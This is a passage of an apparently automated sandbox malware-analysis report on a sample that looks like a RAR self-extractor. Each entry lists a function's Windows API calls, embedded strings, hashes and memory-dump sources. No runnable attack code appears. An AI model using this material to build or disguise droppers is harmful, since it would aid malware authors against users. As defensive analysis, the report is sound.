                                                                                                                    • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                                                                                                                    • String ID: csm$csm$csm
                                                                                                                    • API String ID: 322700389-393685449
                                                                                                                    • Opcode ID: 95c817a2d1ab0cd18f8789394a96481dffb6b9072c14f8069142f82f56710a9b
                                                                                                                    • Instruction ID: 2e869fe1841e04cd84bce1b1e990aaba458f66ac09cfc81c4f598a8c9d72bb94
                                                                                                                    • Opcode Fuzzy Hash: 95c817a2d1ab0cd18f8789394a96481dffb6b9072c14f8069142f82f56710a9b
                                                                                                                    • Instruction Fuzzy Hash: C7B17771808209EFCF29DFA8C8819AEBBF5FF16710F14419AF8016B212D735EA51CB91
                                                                                                                    Function 00B86FA5 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 134COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00B86FAA
                                                                                                                    • _wcslen.LIBCMT ref: 00B87013
                                                                                                                    • _wcslen.LIBCMT ref: 00B87084
                                                                                                                      • Part of subcall function 00B87A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00B87AAB
                                                                                                                      • Part of subcall function 00B87A9C: GetLastError.KERNEL32 ref: 00B87AF1
                                                                                                                      • Part of subcall function 00B87A9C: CloseHandle.KERNEL32(?), ref: 00B87B00
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
                                                                                                                    • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                                                    • API String ID: 3122303884-3508440684
                                                                                                                    • Opcode ID: 68afc31daafca0722f190302f5b99810fa2ffa455afbe8dc68f91a96ac0cc3b3
                                                                                                                    • Instruction ID: 8e12d830d372f0b175453d7f4388b34a5c0ef9715cbe1c3249722b02356f97ca
                                                                                                                    • Opcode Fuzzy Hash: 68afc31daafca0722f190302f5b99810fa2ffa455afbe8dc68f91a96ac0cc3b3
                                                                                                                    • Instruction Fuzzy Hash: F341D4B1D48344AAEB20FB749C86FEE77EC9F05308F1044D5FA55A61A2DA70EA84C721
                                                                                                                    Function 00B9B5C0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00B81316: GetDlgItem.USER32(00000000,00003021), ref: 00B8135A
                                                                                                                      • Part of subcall function 00B81316: SetWindowTextW.USER32(00000000,00BB35F4), ref: 00B81370
                                                                                                                    • EndDialog.USER32(?,00000001), ref: 00B9B610
                                                                                                                    • SendMessageW.USER32(?,00000080,00000001,?), ref: 00B9B637
                                                                                                                    • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 00B9B650
                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 00B9B661
                                                                                                                    • GetDlgItem.USER32(?,00000065), ref: 00B9B66A
                                                                                                                    • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00B9B67E
                                                                                                                    • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00B9B694
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$Item$TextWindow$Dialog
                                                                                                                    • String ID: LICENSEDLG
                                                                                                                    • API String ID: 3214253823-2177901306
                                                                                                                    • Opcode ID: 2d2606d8bd8e0b924083a48e0cda1ebf1b1fef99c1ab1ac9eb7d9127e141e689
                                                                                                                    • Instruction ID: d6c82eb719edd3eb65f387351265372e119e590dcefaaf4905d405f97d009955
                                                                                                                    • Opcode Fuzzy Hash: 2d2606d8bd8e0b924083a48e0cda1ebf1b1fef99c1ab1ac9eb7d9127e141e689
                                                                                                                    • Instruction Fuzzy Hash: F121E732204205BBDA115F66FD8DF3BBBEDEB4AF41F054069F601A70A1DF52A901D631
                                                                                                                    Function 00B9FD10 Relevance: 13.7, APIs: 9, Instructions: 154memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,C3EED02C,00000001,00000000,00000000,?,?,00B8AF6C,ROOT\CIMV2), ref: 00B9FD99
                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,00B8AF6C,ROOT\CIMV2), ref: 00B9FE14
                                                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 00B9FE1F
                                                                                                                    • _com_issue_error.COMSUPP ref: 00B9FE48
                                                                                                                    • _com_issue_error.COMSUPP ref: 00B9FE52
                                                                                                                    • GetLastError.KERNEL32(80070057,C3EED02C,00000001,00000000,00000000,?,?,00B8AF6C,ROOT\CIMV2), ref: 00B9FE57
                                                                                                                    • _com_issue_error.COMSUPP ref: 00B9FE6A
                                                                                                                    • GetLastError.KERNEL32(00000000,?,?,00B8AF6C,ROOT\CIMV2), ref: 00B9FE80
                                                                                                                    • _com_issue_error.COMSUPP ref: 00B9FE93
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1353541977-0
                                                                                                                    • Opcode ID: 8189c47f69966fecea5e45110e2c9897e0fd677656fc458377f4cfacaed630c8
                                                                                                                    • Instruction ID: 718ab3ae8c8eaea3dc9ae0252b1e236bdb01f808f91e8dc7759bf34cf4bc4abf
                                                                                                                    • Opcode Fuzzy Hash: 8189c47f69966fecea5e45110e2c9897e0fd677656fc458377f4cfacaed630c8
                                                                                                                    • Instruction Fuzzy Hash: AD41ED71A0061AAFCF109F68CC45BBEBBE8EF44B20F1042B9F515E7251DB749900C7A5
                                                                                                                    Function 00B8AF24 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 210COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog
                                                                                                                    • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
                                                                                                                    • API String ID: 3519838083-3505469590
                                                                                                                    • Opcode ID: 2d4e64c00821b3dcf68daac49360ed722aada43a6fc18f6142e96996ded8ae46
                                                                                                                    • Instruction ID: 7e2f1228865171323446d3e49835b77d7ecf20be44058db083101a6a14924794
                                                                                                                    • Opcode Fuzzy Hash: 2d4e64c00821b3dcf68daac49360ed722aada43a6fc18f6142e96996ded8ae46
                                                                                                                    • Instruction Fuzzy Hash: 1D713A71A00619EFEF14EFA4CC95DAEB7F9FF48710B140699E516A72A0CB70AD01CB61
                                                                                                                    Function 00B89382 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00B89387
                                                                                                                    • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 00B893AA
                                                                                                                    • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 00B893C9
                                                                                                                      • Part of subcall function 00B8C29A: _wcslen.LIBCMT ref: 00B8C2A2
                                                                                                                      • Part of subcall function 00B91FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00B8C116,00000000,.exe,?,?,00000800,?,?,?,00B98E3C), ref: 00B91FD1
                                                                                                                    • _swprintf.LIBCMT ref: 00B89465
                                                                                                                      • Part of subcall function 00B84092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B840A5
                                                                                                                    • MoveFileW.KERNEL32(?,?), ref: 00B894D4
                                                                                                                    • MoveFileW.KERNEL32(?,?), ref: 00B89514
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
                                                                                                                    • String ID: rtmp%d
                                                                                                                    • API String ID: 3726343395-3303766350
                                                                                                                    • Opcode ID: d63525ed7b4a5ee1a0e7c5dc10f6d1cacc2d70491ecdef441e57fe8bc5f7e246
                                                                                                                    • Instruction ID: 4043ba36d358f3bc582b4027f4046b56ce19ef25660689961261fad302b23da7
                                                                                                                    • Opcode Fuzzy Hash: d63525ed7b4a5ee1a0e7c5dc10f6d1cacc2d70491ecdef441e57fe8bc5f7e246
                                                                                                                    • Instruction Fuzzy Hash: 074151B190025966DF21FBA0CC45EEE73FCEF55740F0848E5B649A3161EB788B89CB60
                                                                                                                    Function 00B91218 Relevance: 12.1, APIs: 8, Instructions: 125timeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __aulldiv.LIBCMT ref: 00B9122E
                                                                                                                      • Part of subcall function 00B8B146: GetVersionExW.KERNEL32(?), ref: 00B8B16B
                                                                                                                    • FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,?), ref: 00B91251
                                                                                                                    • FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,?), ref: 00B91263
                                                                                                                    • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00B91274
                                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00B91284
                                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00B91294
                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 00B912CF
                                                                                                                    • __aullrem.LIBCMT ref: 00B91379
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1247370737-0
                                                                                                                    • Opcode ID: 0524d9f79b28f6aa1a4480f805e91bf2d91749dcd5f598b03fa47499439a5a44
                                                                                                                    • Instruction ID: bb8c2f801238d91cd7141388111e779180665a86cfafec9b1d35a10d2a91d79a
                                                                                                                    • Opcode Fuzzy Hash: 0524d9f79b28f6aa1a4480f805e91bf2d91749dcd5f598b03fa47499439a5a44
                                                                                                                    • Instruction Fuzzy Hash: F541E5B1508306AFC710DF69C88496BBBF9FB88714F008A2EF596D2210E774E549DB51
                                                                                                                    Function 00B82210 Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 468COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _swprintf.LIBCMT ref: 00B82536
                                                                                                                      • Part of subcall function 00B84092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B840A5
                                                                                                                      • Part of subcall function 00B905DA: _wcslen.LIBCMT ref: 00B905E0
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __vswprintf_c_l_swprintf_wcslen
                                                                                                                    • String ID: ;%u$x%u$xc%u
                                                                                                                    • API String ID: 3053425827-2277559157
                                                                                                                    • Opcode ID: cf6266c20bdb91d040b73d2ce2fc3ee253333971f155151dec8606bf036edc82
                                                                                                                    • Instruction ID: edc0d61c0443b8212af0aeb1c82eb03df4b98e7ab9c3234378231f3bd9c5ed23
                                                                                                                    • Opcode Fuzzy Hash: cf6266c20bdb91d040b73d2ce2fc3ee253333971f155151dec8606bf036edc82
                                                                                                                    • Instruction Fuzzy Hash: E5F1F6B06043419BDF15FB288495BFE7BD9AF90300F0805EDED869B2A3DB749945C7A2
                                                                                                                    Function 00B99CFE Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 183COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcslen
                                                                                                                    • String ID: </p>$</style>$<br>$<style>$>
                                                                                                                    • API String ID: 176396367-3568243669
                                                                                                                    • Opcode ID: 5449efdb098aad7003fec5d578cba4a39ac477fd5bc321aba277f8d485804048
                                                                                                                    • Instruction ID: f03961e80c859ce49ba300632393698f10efbb167a865ab91ee8c24cb09384c6
                                                                                                                    • Opcode Fuzzy Hash: 5449efdb098aad7003fec5d578cba4a39ac477fd5bc321aba277f8d485804048
                                                                                                                    • Instruction Fuzzy Hash: E451576670072391DFB09A2D98517B673E0DFA1750F6908BFF9C1CB2D0FBA58C858261
                                                                                                                    Function 00BAF68D Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00BAFE02,00000000,00000000,00000000,00000000,00000000,?), ref: 00BAF6CF
                                                                                                                    • __fassign.LIBCMT ref: 00BAF74A
                                                                                                                    • __fassign.LIBCMT ref: 00BAF765
                                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00BAF78B
                                                                                                                    • WriteFile.KERNEL32(?,00000000,00000000,00BAFE02,00000000,?,?,?,?,?,?,?,?,?,00BAFE02,00000000), ref: 00BAF7AA
                                                                                                                    • WriteFile.KERNEL32(?,00000000,00000001,00BAFE02,00000000,?,?,?,?,?,?,?,?,?,00BAFE02,00000000), ref: 00BAF7E3
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1324828854-0
                                                                                                                    • Opcode ID: e71be9f9ec46942d4e58b81965fab7a157cd38efc69b54d11319dc2362cbb27d
                                                                                                                    • Instruction ID: 15770cecba5d7d360b5d71bd1b510650cba6042443d86d2e300974af374dfdce
                                                                                                                    • Opcode Fuzzy Hash: e71be9f9ec46942d4e58b81965fab7a157cd38efc69b54d11319dc2362cbb27d
                                                                                                                    • Instruction Fuzzy Hash: 3A51A5B1D0424A9FDB10CFA8DC85AEEBBF8EF09710F1441AAE555E7251D770AA41CBA0
                                                                                                                    Function 00BA2900 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00BA2937
                                                                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 00BA293F
                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00BA29C8
                                                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 00BA29F3
                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00BA2A48
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                    • String ID: csm
                                                                                                                    • API String ID: 1170836740-1018135373
                                                                                                                    • Opcode ID: 0779bc574c19d8bec660abdabfdc45d98eb3282da12152451955ae52ee366e13
                                                                                                                    • Instruction ID: cc337c8869f85660e0ea6bf6a41abb80adb386dad93de72ce76a726b8dc60d71
                                                                                                                    • Opcode Fuzzy Hash: 0779bc574c19d8bec660abdabfdc45d98eb3282da12152451955ae52ee366e13
                                                                                                                    • Instruction Fuzzy Hash: E641A230A04218AFCF10DF6CC885AAEBBE5EF46724F1481E5E8156B3A2D775DA05CB91
                                                                                                                    Function 00B99ED5 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ShowWindow.USER32(?,00000000), ref: 00B99EEE
                                                                                                                    • GetWindowRect.USER32(?,00000000), ref: 00B99F44
                                                                                                                    • ShowWindow.USER32(?,00000005,00000000), ref: 00B99FDB
                                                                                                                    • SetWindowTextW.USER32(?,00000000), ref: 00B99FE3
                                                                                                                    • ShowWindow.USER32(00000000,00000005), ref: 00B99FF9
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$Show$RectText
                                                                                                                    • String ID: RarHtmlClassName
                                                                                                                    • API String ID: 3937224194-1658105358
                                                                                                                    • Opcode ID: 67bc2061ae79c1f814500de7d8fbec3fda8968943cf76ed853306627d541a88e
                                                                                                                    • Instruction ID: a48e5b1af763d9cf000abae8d56be60b54d8bb43ca4590176139421340278ff9
                                                                                                                    • Opcode Fuzzy Hash: 67bc2061ae79c1f814500de7d8fbec3fda8968943cf76ed853306627d541a88e
                                                                                                                    • Instruction Fuzzy Hash: 70419131008210AFDB615F689C8DB6BBBE8EF49B11F0045ADF845AB156CB34E944CBA2
                                                                                                                    Function 00B99955 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcslen
                                                                                                                    • String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                                                                                    • API String ID: 176396367-3743748572
                                                                                                                    • Opcode ID: 19dcea579e304f228e0ffe502b6a234afc9bc79c77832634838351a20cdd3dba
                                                                                                                    • Instruction ID: 3e030819f33120612c3d044491dba0535dfd30ee7bad4c8a41c8e7b1fef9234e
                                                                                                                    • Opcode Fuzzy Hash: 19dcea579e304f228e0ffe502b6a234afc9bc79c77832634838351a20cdd3dba
                                                                                                                    • Instruction Fuzzy Hash: D5318F7664834557EE34AB589C43B7B73E4EB91720F6444BFF482472C0FBA0AD8183A1
                                                                                                                    Function 00BAC8A4 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
